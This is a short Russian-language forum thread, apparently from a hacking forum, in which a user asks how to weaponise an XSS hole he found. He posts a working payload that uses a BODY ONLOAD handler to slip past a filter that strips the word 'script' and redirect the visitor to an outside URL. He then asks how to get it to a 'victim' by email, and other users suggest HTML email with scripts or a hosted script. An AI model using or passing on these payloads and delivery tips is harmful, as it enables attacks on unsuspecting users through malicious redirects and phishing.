Просмотр полной версии : дайте совет по использованию Xss
zloy_admin
10.01.2008, 04:22
Нашел где срабатывает
<BODY ONLOAD=alert('XSS')>
это всё в ХТМЛ
как это можно применить?
желаемый эффект:
автоматическое открытие определенного урл.
Вот только проблема: слово 'script' съедает фильтр
zloy_admin
10.01.2008, 06:01
вобщем нашел решение сам:
<BODY ONLOAD=location.replace("http://www.new.site/page.html")>
теперь возникла проблема №2:
Как отправить это жертве по почте?
Если я это делаю через вэб-интерфейс, то код исполняется сразу же у меня локально.....
Что посоветуете?
попробуй отправить письмом в html скриптами
zloy_admin
10.01.2008, 06:22
кстати, может есть подобный он-лайн сервис?
Да епт повесь скриптец на хост и радуйся, здесь выкладывали. и пользуйся когда надо сам
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot